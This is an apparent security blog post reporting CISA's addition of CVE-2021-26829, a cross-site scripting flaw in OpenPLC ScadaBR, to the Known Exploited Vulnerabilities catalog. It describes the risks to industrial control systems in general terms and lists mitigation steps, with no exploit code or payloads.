CISA Adds Actively Exploited OpenPLC ScadaBR Flaw to KEV Catalog

CISA has added **CVE-2021-26829**, an actively exploited **OpenPLC ScadaBR Cross-site Scripting (XSS) vulnerability**, to its **Known Exploited Vulnerabilities (KEV) Catalog**. This flaw poses significant risks to organizations, particularly in industrial control systems (ICS). Federal agencies and private organizations are urged to prioritize remediation to mitigate potential cyberattacks.

---
title: "CISA Adds Actively Exploited OpenPLC ScadaBR Flaw to KEV Catalog"
short_title: "CISA adds OpenPLC ScadaBR flaw to KEV Catalog"
description: "CISA adds CVE-2021-26829, an actively exploited OpenPLC ScadaBR XSS vulnerability, to its KEV Catalog. Learn about the risks and mitigation steps."
author: "Tom"
date: 2025-11-28
categories: [Cybersecurity, Vulnerabilities]
tags: [cve-2021-26829, openplc, scadabr, xss, vulnerability]
score: 0.85
cve_ids: [CVE-2021-26829]
---

TL;DR


CISA has added CVE-2021-26829, an actively exploited OpenPLC ScadaBR Cross-site Scripting (XSS) vulnerability, to its Known Exploited Vulnerabilities (KEV) Catalog. This flaw poses significant risks to organizations, particularly in industrial control systems (ICS). Federal agencies and private organizations are urged to prioritize remediation to mitigate potential cyberattacks.

Main Content

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) Catalog to include CVE-2021-26829, a Cross-site Scripting (XSS) vulnerability in OpenPLC ScadaBR. This addition is based on evidence of active exploitation by malicious actors, highlighting the critical need for immediate action.

Cross-site Scripting vulnerabilities like CVE-2021-26829 are frequently exploited to compromise systems, steal sensitive data, or gain unauthorized access. Given the widespread use of ScadaBR in industrial environments, this vulnerability poses a significant risk to operational technology (OT) and enterprise networks.

---

Key Points


- CVE-2021-26829 is an XSS vulnerability in OpenPLC ScadaBR, a popular open-source platform for industrial automation.
- CISA added this vulnerability to its KEV Catalog due to evidence of active exploitation.
- The Binding Operational Directive (BOD) 22-01 mandates that Federal Civilian Executive Branch (FCEB) agencies remediate this vulnerability by the specified due date.
- While BOD 22-01 applies only to FCEB agencies, CISA strongly recommends that all organizations prioritize patching this vulnerability to reduce exposure to cyber threats.

---

Technical Details


CVE-2021-26829 is a Cross-site Scripting (XSS) vulnerability that allows attackers to inject malicious scripts into web pages viewed by users. In the context of ScadaBR, this could enable attackers to:
- Steal session cookies or credentials.
- Redirect users to malicious websites.
- Execute arbitrary code in the context of a user's browser.

XSS vulnerabilities are particularly dangerous in industrial control systems (ICS) like ScadaBR, as they can disrupt operations, compromise safety, and lead to unauthorized access to critical infrastructure.

---

Impact Assessment


The inclusion of CVE-2021-26829 in CISA's KEV Catalog underscores its critical severity and the active threat it poses. Organizations failing to address this vulnerability risk:
- Data breaches due to stolen credentials or session hijacking.
- Operational disruptions in industrial environments.
- Regulatory non-compliance for FCEB agencies.

Given the widespread use of ScadaBR in sectors like manufacturing, energy, and utilities, the potential impact of this vulnerability extends beyond federal systems to private enterprises globally.

---

Mitigation Steps


To mitigate the risks associated with CVE-2021-26829, organizations should:
1. Patch Immediately: Apply the latest updates for OpenPLC ScadaBR to address the XSS vulnerability.
2. Monitor for Exploitation: Use intrusion detection systems (IDS) to detect and block malicious activity.
3. Implement Security Best Practices:
- Enforce least privilege access for users.
- Use Content Security Policy (CSP) headers to mitigate XSS risks.
- Conduct regular vulnerability scans and penetration testing.

For FCEB agencies, compliance with BOD 22-01 is mandatory, while all other organizations are strongly encouraged to follow CISA's recommendations.

---

Conclusion


The addition of CVE-2021-26829 to CISA's KEV Catalog serves as a critical reminder of the ongoing threats posed by XSS vulnerabilities, particularly in industrial control systems. Organizations must act swiftly to patch this flaw and implement robust security measures to protect against exploitation. Proactive vulnerability management is essential to safeguarding both federal and private networks from evolving cyber threats.

References


[^1]: CISA. "[CISA Adds One Known Exploited Vulnerability to Catalog](https://www.cisa.gov/news-events/alerts/2025/11/28/cisa-adds-one-known-exploited-vulnerability-catalog)". Retrieved 2025-11-28.
[^2]: CISA. "[Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)". Retrieved 2025-11-28.
[^3]: CISA. "[Binding Operational Directive 22-01](https://www.cisa.gov/binding-operational-directive-22-01)". Retrieved 2025-11-28.

Related CVEs